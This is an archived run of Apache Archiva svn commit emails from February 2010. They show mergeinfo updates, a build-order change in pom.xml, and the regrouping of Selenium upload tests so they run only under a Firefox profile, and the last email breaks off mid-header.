/archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutor.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutor.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutor.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutor.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutor.java:825850-899477 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutor.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryArchivaTaskScheduler.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryArchivaTaskScheduler.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryArchivaTaskScheduler.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryArchivaTaskScheduler.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryArchivaTaskScheduler.java:825850-899477 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryArchivaTaskScheduler.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTask.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTask.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTask.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTask.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTask.java:825850-899477 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTask.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTaskJob.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTaskJob.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTaskJob.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTaskJob.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTaskJob.java:825850-899477 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTaskJob.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository:825850-882054,882055-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.java:825850-899477 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestConsumer.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestConsumer.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestConsumer.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestConsumer.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestConsumer.java:825850-882054,887040-899477 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestConsumer.java:825850-882054,887040-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestRepositoryStatisticsManager.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestRepositoryStatisticsManager.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestRepositoryStatisticsManager.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestRepositoryStatisticsManager.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestRepositoryStatisticsManager.java:825850-882054,887040-899477 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestRepositoryStatisticsManager.java:825850-882054,887040-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources:825850-882054,882055-899477* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources:825850-882054,882055-909070* From [email protected] Fri Feb 12 04:17:07 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93004 invoked from network); 12 Feb 2010 04:17:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 04:17:07 -0000 Received: (qmail 42332 invoked by uid 500); 12 Feb 2010 04:17:07 -0000 Delivered-To: [email protected] Received: (qmail 42270 invoked by uid 500); 12 Feb 2010 04:17:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 42261 invoked by uid 99); 12 Feb 2010 04:17:07 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 04:17:07 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 04:17:04 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id DDE2E23889CB; Fri, 12 Feb 2010 04:16:43 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909220 - /archiva/branches/MRM-1025/pom.xml Date: Fri, 12 Feb 2010 04:16:43 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Fri Feb 12 04:16:43 2010 New Revision: 909220 URL: http://svn.apache.org/viewvc?rev=909220&view=rev Log: make sure skin is build before modules where it is used Modified: archiva/branches/MRM-1025/pom.xml Modified: archiva/branches/MRM-1025/pom.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/pom.xml?rev=909220&r1=909219&r2=909220&view=diff ============================================================================== --- archiva/branches/MRM-1025/pom.xml (original) +++ archiva/branches/MRM-1025/pom.xml Fri Feb 12 04:16:43 2010 @@ -198,11 +198,11 @@ </pluginManagement> </build> <modules> + <module>skin</module> <module>archiva-cli</module> <module>archiva-docs</module> <module>archiva-jetty</module> <module>archiva-modules</module> - <module>skin</module> </modules> <dependencies> <dependency> @@ -1229,4 +1229,4 @@ <url>http://vmbuild.apache.org/archiva/repository/staged-archiva</url> </repository> </distributionManagement> -</project> \ No newline at end of file +</project> From [email protected] Fri Feb 12 11:02:27 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51462 invoked from network); 12 Feb 2010 11:02:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 11:02:27 -0000 Received: (qmail 66451 invoked by uid 500); 12 Feb 2010 11:02:27 -0000 Delivered-To: [email protected] Received: (qmail 66385 invoked by uid 500); 12 Feb 2010 11:02:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 66376 invoked by uid 99); 12 Feb 2010 11:02:26 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 11:02:26 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 11:02:24 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 23FB523889ED; Fri, 12 Feb 2010 11:02:03 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909354 - in /archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test: ./ src/test/testng/org/apache/archiva/web/test/ Date: Fri, 12 Feb 2010 11:02:02 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Fri Feb 12 11:02:02 2010 New Revision: 909354 URL: http://svn.apache.org/viewvc?rev=909354&view=rev Log: enable tests that only work on firefox, conditional on the firefox profile Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/pom.xml archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/BrowseTest.java Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/pom.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/pom.xml?rev=909354&r1=909353&r2=909354&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/pom.xml (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/pom.xml Fri Feb 12 11:02:02 2010 @@ -148,9 +148,21 @@ <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-surefire-plugin</artifactId> <configuration> - <suiteXmlFiles> - <suiteXmlFile>src/test/testng/config/testng.xml</suiteXmlFile> - </suiteXmlFiles> + <properties> + <!-- + Use this instead of suiteXmlFiles so that we can add the exclusion, as it is only accepted if you use + the 'all command line parameters' mode. + --> + <property> + <name>suitename</name> + <value>${basedir}/src/test/testng/config/testng.xml</value> + </property> + <property> + <name>excludegroups</name> + <!-- Exclude on all browsers but Firefox, as it is the only one that Selenium supports file uploads on --> + <value>${excluded.groups}</value> + </property> + </properties> </configuration> <executions> <execution> @@ -165,7 +177,7 @@ <name>browser</name> <value>${selenium.browser}</value> </property> - <property> + <property> <name>baseUrl</name> <value>${baseUrl}</value> </property> @@ -404,6 +416,7 @@ </activation> <properties> <selenium.browser>*firefox</selenium.browser> + <excluded.groups /> </properties> </profile> <profile> @@ -416,6 +429,7 @@ </activation> <properties> <selenium.browser>*iexplore</selenium.browser> + <excluded.groups>requiresUpload</excluded.groups> </properties> </profile> <profile> @@ -428,6 +442,7 @@ </activation> <properties> <selenium.browser>*safari</selenium.browser> + <excluded.groups>requiresUpload</excluded.groups> </properties> </profile> <profile> @@ -440,6 +455,7 @@ </activation> <properties> <selenium.browser>*custom ${browserPath}</selenium.browser> + <excluded.groups>requiresUpload</excluded.groups> </properties> </profile> <profile> Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java?rev=909354&r1=909353&r2=909354&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java Fri Feb 12 11:02:02 2010 @@ -83,7 +83,7 @@ assertTextPresent( "Please add a file to upload." ); } - @Test( enabled = false ) + @Test(groups = "requiresUpload") public void testAddArtifactValidValues() { // TODO: disable test on non *chrome browsers, there is no way to do file uploads (SEL-63) @@ -92,7 +92,7 @@ } //MRM-747 - @Test( enabled = false ) + @Test(groups = "requiresUpload") public void testAddArtifactBlockRedeployments() { // TODO: disable test on non *chrome browsers, there is no way to do file uploads (SEL-63) @@ -100,7 +100,7 @@ assertTextPresent( "Overwriting released artifacts in repository '" + getRepositoryId() + "' is not allowed." ); } - @Test( enabled = false ) + @Test(groups = "requiresUpload") public void testDeleteArtifact() { //prep Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java?rev=909354&r1=909353&r2=909354&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java Fri Feb 12 11:02:02 2010 @@ -69,7 +69,7 @@ // TODO: add test for adding via WebDAV // TODO: disable if not running on *chrome - @Test (dependsOnMethods = { "testAddArtifactValidValues" }, enabled = false ) + @Test (dependsOnMethods = { "testAddArtifactValidValues" }, groups = "requiresUpload") public void testViewAuditLogsDataFound() { goToAuditLogReports(); @@ -90,7 +90,7 @@ // TODO: add test for adding via WebDAV // TODO: disable if not running on *chrome - @Test (dependsOnMethods = { "testAddArtifactValidValues" }, enabled = false ) + @Test (dependsOnMethods = { "testAddArtifactValidValues" }, groups = "requiresUpload") public void testViewAuditLogsOnlyArtifactIdIsSpecified() { goToAuditLogReports(); @@ -111,7 +111,7 @@ // TODO: add test for adding via WebDAV // TODO: disable if not running on *chrome - @Test (dependsOnMethods = { "testAddArtifactValidValues" }, enabled = false ) + @Test (dependsOnMethods = { "testAddArtifactValidValues" }, groups = "requiresUpload") public void testViewAuditLogsForAllRepositories() { goToAuditLogReports(); @@ -129,7 +129,7 @@ assertTextPresent( "admin" ); } - @Test (dependsOnMethods = { "testAddArtifactValidValues", "testUserWithRepoManagerInternalRole" }, enabled = false ) + @Test (dependsOnMethods = { "testAddArtifactValidValues", "testUserWithRepoManagerInternalRole" }, groups = "requiresUpload") public void testViewAuditLogsViewAuditEventsForManageableRepositoriesOnly() { String groupId = getProperty( "SNAPSHOT_GROUPID" ); Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/BrowseTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/BrowseTest.java?rev=909354&r1=909353&r2=909354&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/BrowseTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/BrowseTest.java Fri Feb 12 11:02:02 2010 @@ -45,7 +45,7 @@ } // MRM-1278 - @Test( enabled = false ) + @Test(groups = {"requiresUpload"}) public void testCorrectRepositoryInBrowse() { File artifact = From [email protected] Fri Feb 12 11:05:46 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55366 invoked from network); 12 Feb 2010 11:05:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 11:05:46 -0000 Received: (qmail 67625 invoked by uid 500); 12 Feb 2010 11:05:46 -0000 Delivered-To: [email protected] Received: (qmail 67569 invoked by uid 500); 12 Feb 2010 11:05:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67560 invoked by uid 99); 12 Feb 2010 11:05:46 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 11:05:46 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 11:05:45 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 5539823889ED; Fri, 12 Feb 2010 11:05:25 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909356 - in /archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test: ArtifactManagementTest.java AuditLogsReportTest.java Date: Fri, 12 Feb 2010 11:05:25 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Fri Feb 12 11:05:24 2010 New Revision: 909356 URL: http://svn.apache.org/viewvc?rev=909356&view=rev Log: remove comments no longer relevant Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java?rev=909356&r1=909355&r2=909356&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArtifactManagementTest.java Fri Feb 12 11:05:24 2010 @@ -86,7 +86,6 @@ @Test(groups = "requiresUpload") public void testAddArtifactValidValues() { - // TODO: disable test on non *chrome browsers, there is no way to do file uploads (SEL-63) addArtifact( getGroupId() , "testAddArtifactValidValues", getVersion(), getPackaging() , getArtifactFilePath(), getRepositoryId() ); assertTextPresent( "Artifact 'test:test:1.0' was successfully deployed to repository 'internal'" ); } @@ -95,7 +94,6 @@ @Test(groups = "requiresUpload") public void testAddArtifactBlockRedeployments() { - // TODO: disable test on non *chrome browsers, there is no way to do file uploads (SEL-63) addArtifact( getGroupId() , getArtifactId(), getVersion(), getPackaging() , getArtifactFilePath(), getRepositoryId() ); assertTextPresent( "Overwriting released artifacts in repository '" + getRepositoryId() + "' is not allowed." ); } Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java?rev=909356&r1=909355&r2=909356&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java Fri Feb 12 11:05:24 2010 @@ -68,7 +68,6 @@ } // TODO: add test for adding via WebDAV - // TODO: disable if not running on *chrome @Test (dependsOnMethods = { "testAddArtifactValidValues" }, groups = "requiresUpload") public void testViewAuditLogsDataFound() { @@ -89,7 +88,6 @@ } // TODO: add test for adding via WebDAV - // TODO: disable if not running on *chrome @Test (dependsOnMethods = { "testAddArtifactValidValues" }, groups = "requiresUpload") public void testViewAuditLogsOnlyArtifactIdIsSpecified() { @@ -110,7 +108,6 @@ } // TODO: add test for adding via WebDAV - // TODO: disable if not running on *chrome @Test (dependsOnMethods = { "testAddArtifactValidValues" }, groups = "requiresUpload") public void testViewAuditLogsForAllRepositories() { From [email protected] Fri Feb 12 11:57:38 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74128 invoked from network); 12 Feb 2010 11:57:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 11:57:37 -0000 Received: (qmail 25743 invoked by uid 500); 12 Feb 2010 11:57:37 -0000 Delivered-To: [email protected] Received: (qmail 25683 invoked by uid 500); 12 Feb 2010 11:57:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 25674 invoked by uid 99); 12 Feb 2010 11:57:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 11:57:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 11:57:36 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id A93A923889ED; Fri, 12 Feb 2010 11:57:16 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909372 - in /archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test: pom.xml src/test/testng/config/ Date: Fri, 12 Feb 2010 11:57:15 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Fri Feb 12 11:57:15 2010 New Revision: 909372 URL: 